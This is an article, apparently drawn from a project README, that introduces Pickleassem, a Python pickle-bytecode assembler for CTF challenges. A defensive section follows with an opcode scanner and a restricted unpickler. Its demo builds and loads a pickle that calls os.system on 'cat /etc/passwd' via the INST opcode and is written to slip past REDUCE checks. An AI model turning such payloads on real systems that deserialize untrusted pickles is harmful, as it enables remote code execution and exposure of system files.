
Simplifying Pickle Bytecode with Pickleassem: A Handy Tool for CTF Challenges

CTF (Capture The Flag) challenges often involve complex tasks that require manipulating and exploiting different technologies and vulnerabilities. One common challenge in CTFs involves pickle objects, which are serialized Python objects often used for data transfer and persistence. Handcrafting pickle bytecode is a tedious task that requires deep understanding of the pickle protocol and its opcodes. But fear not, because Pickleassem is here to simplify the process and make your life easier.

What is Pickleassem?

Pickleassem is a simple pickle assembler designed to make handcrafting pickle bytecode a breeze. Developed by gousaiyang, it provides a Python library that makes it easy to create custom pickle objects with minimal effort.

Features and Functionalities

Pickleassem offers a range of features to simplify pickle bytecode creation. Here are some of its key functionalities:

  1. Push, Build, Pop, and Memo: Pickleassem provides methods that correspond to different pickle opcodes, such as push, build, pop, and memo. These functions allow you to easily push data onto the pickle stack, build arbitrary class instances, and pop values off the stack as needed.

  2. Raw Opcodes: The library also offers the append_raw method, which allows you to insert arbitrary raw opcodes into the bytecode. This flexibility gives you full control over the serialization process.

  3. Higher-Level Utility Functions: Pickleassem includes utility functions that simplify common tasks. For example, the util_push function allows you to push Python objects onto the stack using a more convenient syntax.

A Demo to Showcase its Functionality

To illustrate how Pickleassem works, let’s take a look at a demo:

```python
import pickle
import pickletools

from pickleassem import PickleAssembler

pa = PickleAssembler(proto=4)
pa.push_mark()                     # MARK: start the argument list for the call
pa.util_push('cat /etc/passwd')    # push the single string argument
pa.build_inst('os', 'system')      # INST opcode: resolve os.system and call it with the marked args
payload = pa.assemble()
assert b'R' not in payload         # no REDUCE opcode is needed for this construction
print(payload)
pickletools.dis(payload, annotate=1)   # disassemble with per-opcode annotations
pickle.loads(payload)              # unpickling runs the command
```

In the above example, we import the necessary libraries and create an instance of PickleAssembler. We then push a mark onto the stack, followed by the command string 'cat /etc/passwd' using the util_push method. Next, build_inst emits the INST opcode for os.system, so that on unpickling the callable os.system is resolved and invoked with the pushed string as its argument; the assert shows that this construction needs no REDUCE opcode. Finally, we assemble the payload and demonstrate how the bytecode can be disassembled and loaded using the pickletools and pickle libraries, respectively.
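As a defender-side companion to the demo, here is an added example (not from the Pickleassem README) that lists code-execution opcodes with pickletools.genops without unpickling, and loads only pure-data pickles through a restricted Unpickler. The malicious sample is a hand-written protocol-0 encoding of the demo's MARK / STRING / INST os system / STOP sequence, constructed for this example and never passed to pickle.loads().

```python
import io
import pickle
import pickletools

# Opcodes that resolve or call Python callables during unpickling. A payload
# built with INST, as in the demo, contains no REDUCE ('R'), so checking for
# b'R' alone is not a defence.
CODE_EXEC_OPCODES = frozenset({
    "GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",
    "REDUCE", "BUILD", "EXT1", "EXT2", "EXT4",
})

# Constructed sample: protocol-0 form of the demo's opcode sequence
# (MARK, STRING 'cat /etc/passwd', INST os system, STOP). Never executed here.
MALICIOUS_PAYLOAD = b"(S'cat /etc/passwd'\nios\nsystem\n."

# Constructed benign sample: a plain data pickle from the standard library.
BENIGN_PAYLOAD = pickle.dumps({"a": [1, 2]})


def scan_for_code_execution(data: bytes) -> list:
    """Statically list opcodes that could execute code, without unpickling.
    Returns (opcode_name, byte_offset, argument) triples; empty means pure data."""
    findings = []
    for opcode, arg, pos in pickletools.genops(data):
        if opcode.name in CODE_EXEC_OPCODES:
            findings.append((opcode.name, pos, arg))
    return findings


class RestrictedUnpickler(pickle.Unpickler):
    """Refuses every global lookup, so GLOBAL/INST/STACK_GLOBAL fail before
    any callable such as os.system is reached."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def safe_loads(data: bytes):
    """Load only pure-data pickles; raises UnpicklingError on any global reference."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data: bytes) -> bool:
    """True when safe_loads() refuses the stream because it references a global."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    print(scan_for_code_execution(MALICIOUS_PAYLOAD))  # flags the INST opcode
    print(scan_for_code_execution(BENIGN_PAYLOAD))     # []
    print(is_rejected(MALICIOUS_PAYLOAD), safe_loads(BENIGN_PAYLOAD))
```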

Documentation and Usage

To get started with Pickleassem, simply install it using pip:

```bash
pip install -U pickleassem
```

For detailed usage information, refer to the accompanying source code. Each method of PickleAssembler follows the naming convention of corresponding to a specific pickle opcode. Methods starting with push, build, pop, or memo are used to perform stack operations. Additionally, append_raw allows for the insertion of raw opcodes.

Please note that not all opcodes and corresponding features are implemented in Pickleassem. The library does not support PERSID, BINPERSID, EXT1, EXT2, EXT4, FRAME, NEXT_BUFFER, or READONLY_BUFFER.

See Also

If you’re interested in other tools for pickle exploitation, check out these resources:

  • anapickle: This tool provides a thorough analysis of pickles and their vulnerabilities. You can find more information in their slides and repository.

  • pwnypack.pickle: Another useful tool for working with pickles, provided by the pwnypack library.

Pickleassem offers a unique and user-friendly approach to handcrafting pickle bytecode, making it an essential tool for CTF challenges. Whether you’re a beginner or an experienced CTF enthusiast, this library simplifies the process, allowing you to focus on solving the challenge at hand. Give Pickleassem a try and elevate your CTF game to new heights!

Source: https://github.com/gousaiyang/pickleassem/raw/master/README.md
